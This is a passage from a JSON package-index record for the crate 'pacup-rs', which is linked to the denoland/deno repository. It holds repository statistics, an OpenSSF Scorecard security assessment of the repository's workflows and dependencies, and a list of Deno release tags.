pacscripts","homepage":"https://github.com/denoland/deno","licenses":"GPL-3.0","normalized_licenses":["GPL-3.0"],"repository_url":"https://github.com/denoland/deno","keywords_array":["linux","package-manager","aur","pacstall","apt"],"namespace":null,"versions_count":2,"first_release_published_at":"2023-01-11T08:16:06.768Z","latest_release_published_at":"2023-01-11T08:22:42.058Z","latest_release_number":"2.0.0","last_synced_at":"2026-08-29T21:57:39.443Z","created_at":"2023-01-11T08:24:13.984Z","updated_at":"2026-08-29T21:57:39.443Z","registry_url":"https://crates.io/crates/pacup-rs/","install_command":"cargo install pacup-rs","documentation_url":"https://docs.rs/pacup-rs/","metadata":{"categories":[]},"repo_metadata":{"id":37251508,"uuid":"133442384","full_name":"denoland/deno","owner":"denoland","description":"A modern runtime for JavaScript and TypeScript.","archived":false,"fork":false,"pushed_at":"2026-08-22T12:52:12.000Z","size":247311,"stargazers_count":108275,"open_issues_count":1528,"forks_count":6351,"subscribers_count":1426,"default_branch":"main","last_synced_at":"2026-08-22T15:40:08.889Z","etag":null,"topics":["deno","javascript","rust","typescript"],"latest_commit_sha":null,"homepage":"https://deno.com","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/denoland.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":".github/CONTRIBUTING.md","funding":null,"license":"LICENSE.md","code_of_conduct":".github/CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":".github/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":".github/copilot-instructions.md","dco":null,"cla":null,"disclosure":null}},"created_at":"2018-05-15T01:34:26.000Z","updated_at":"2026-08-22T14:38:59.000Z","dependencies_parsed_at":"2026-08-08T17:34:36.142Z","dependency_job_id":null,"html_url":"https://github.com/denoland/deno","commit_stats":{"total_commits":12946,"total_committers":999,"mean_commits":12.95895895895896,"dds":0.8464390545342191,"last_synced_commit":"9ad0d4c3db85ce9f8007dc088d164bcc7f544708"},"previous_names":[],"tags_count":440,"template":false,"template_full_name":null,"purl":"pkg:github/denoland/deno","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","download_url":"https://codeload.github.com/denoland/deno/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/sbom","scorecard":{"id":334411,"data":{"date":"2025-08-11","repo":{"name":"github.com/denoland/deno","commit":"228574b04210ad54baf04126810e2c113a462bcc"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 14 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: .github/SECURITY.md:1","Info: Found linked content: .github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: .github/SECURITY.md:1","Info: Found text in security policy: .github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/promote_to_release.yml:24","Warn: no topLevel permission defined: .github/workflows/cargo_publish.yml:1","Warn: topLevel 'contents' permission set to 'write': .github/workflows/ci.yml:5","Warn: no topLevel permission defined: .github/workflows/node_compat_test.yml:1","Warn: no topLevel permission defined: .github/workflows/post_publish.yml:1","Warn: no topLevel permission defined: .github/workflows/pr.yml:1","Warn: no topLevel permission defined: .github/workflows/promote_to_release.yml:1","Warn: no topLevel permission defined: .github/workflows/start_release.yml:1","Warn: no topLevel permission defined: .github/workflows/version_bump.yml:1","Warn: no topLevel permission defined: .github/workflows/wpt_epoch.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.md:0","Info: FSF or OSI recognized license: MIT License: LICENSE.md:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Binary-Artifacts","score":5,"reason":"binaries present in source code","details":["Warn: binary detected: tests/specs/npm/pkg_index_ts_and_js/node_modules/package/wasm/index.wasm:1","Warn: binary detected: tests/specs/run/error_bad_wasm_import/toolkit.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/cjs_importing/math.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/table_global_memory/mod.wasm:1","Warn: binary detected: tests/specs/run/wasm_unreachable/unreachable.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Branch-Protection","score":8,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'force pushes' disabled on branch 'main'","Warn: required approving review count is 1 on branch 'main'","Warn: codeowners review is not required on branch 'main'","Info: status check found to merge onto on branch 'main'","Info: PRs are required in order to make changes on branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact v2.4.4 not signed: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 not signed: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 not signed: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 not signed: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 not signed: https://api.github.com/repos/denoland/deno/releases/230701638","Warn: release artifact v2.4.4 does not have provenance: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 does not have provenance: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 does not have provenance: https://api.github.com/repos/denoland/deno/releases/230701638"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/npm_publish.yml:16"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:790: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:795: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:822: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:829: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:153: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:182: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:194: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:198: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:202: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:216: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:226: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:240: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:251: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:384: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:401: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:462: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:509: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:522: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:731: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:766: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:22: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:63: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:67: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/post_publish.yml:14: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/pr.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/pr.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:65: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:73: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:104: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:119: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:125: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:133: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:138: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:155: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/start_release.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/start_release.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/version_bump.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:43: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:38: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: containerImage not pinned by hash: .devcontainer/Dockerfile:1: pin your Docker image by updating mcr.microsoft.com/devcontainers/rust:1 to mcr.microsoft.com/devcontainers/rust:1@sha256:fc57fb865035c5395e85246c8842b071ced6e7cde727b3c98abbcc794eaf4759","Warn: downloadThenRun not pinned by hash: .devcontainer/Dockerfile:10","Info:   0 out of  25 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of  35 third-party GitHubAction dependencies pinned","Info:   0 out of   1 containerImage dependencies pinned","Info:   0 out of   1 downloadThenRun dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":6,"reason":"4 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-v7pc-74h8-xq2h","Warn: Project is vulnerable to: RUSTSEC-2025-0006","Warn: Project is vulnerable to: RUSTSEC-2024-0436","Warn: Project is vulnerable to: RUSTSEC-2023-0071 / GHSA-4grx-2x9w-596c / GHSA-c38w-74pg-36hr"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T04:23:13.226Z","repository_id":37251508,"created_at":"2025-08-18T04:23:13.226Z","updated_at":"2025-08-18T04:23:13.226Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36827962,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"ssl_error","status_checked_at":"2026-08-22T15:14:58.237Z","response_time":51,"last_error":"SSL_read: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"denoland","name":"Deno","uuid":"42048915","kind":"organization","description":"","email":"support@deno.com","website":"https://deno.land","location":null,"twitter":"deno_land","company":null,"icon_url":"https://avatars.githubusercontent.com/u/42048915?v=4","repositories_count":89,"last_synced_at":"2023-04-09T21:37:02.792Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/denoland","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-02T16:32:27.195Z","updated_at":"2023-04-09T21:37:03.563Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland/repositories"},"tags":[{"name":"v2.9.5","sha":"17fadf33a8df3af9488b9f42efd1f2290d6dc7a3","kind":"commit","published_at":"2026-08-06T11:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5/manifests"},{"name":"v2.9.4","sha":"14eea3160ae5834476aa3b9d317b8d41d991b982","kind":"commit","published_at":"2026-07-23T14:13:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4/manifests"},{"name":"v2.9.3","sha":"f39575ecd50602a5b42b1ba8e93849460de9fcf4","kind":"commit","published_at":"2026-07-15T13:38:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3/manifests"},{"name":"v2.9.2","sha":"356c132ed60e679b34535a287a493193aa8bb6a4","kind":"commit","published_at":"2026-07-08T10:45:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"7afe265234add47e7602f2e91c318f3eff245aa8","kind":"commit","published_at":"2026-07-01T13:28:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"94d375ddd02b7b9eb464781e4bd9e68bf262aacc","kind":"commit","published_at":"2026-06-25T11:49:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0/manifests"},{"name":"v2.8.3","sha":"ba699088698c7b4a2fbea33acc4dcd6571789452","kind":"commit","published_at":"2026-06-11T12:02:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3/manifests"},{"name":"v2.8.2","sha":"085be0b5ff8ca3ccfe58318afe0939c4d4af9743","kind":"commit","published_at":"2026-06-03T11:51:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2/manifests"},{"name":"v2.8.1","sha":"3e2030bc01776ce6b4ca355b1e78c4cb98c82dca","kind":"commit","published_at":"2026-05-27T10:23:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"fbb5be31ac23ef40f51025d6aeaaa91d9f082e4a","kind":"commit","published_at":"2026-05-22T08:06:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0/manifests"},{"name":"v2.7.14","sha":"2d674b25625bcc367853d00fe86f6e84390f88cb","kind":"commit","published_at":"2026-04-28T12:41:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.14","tag_u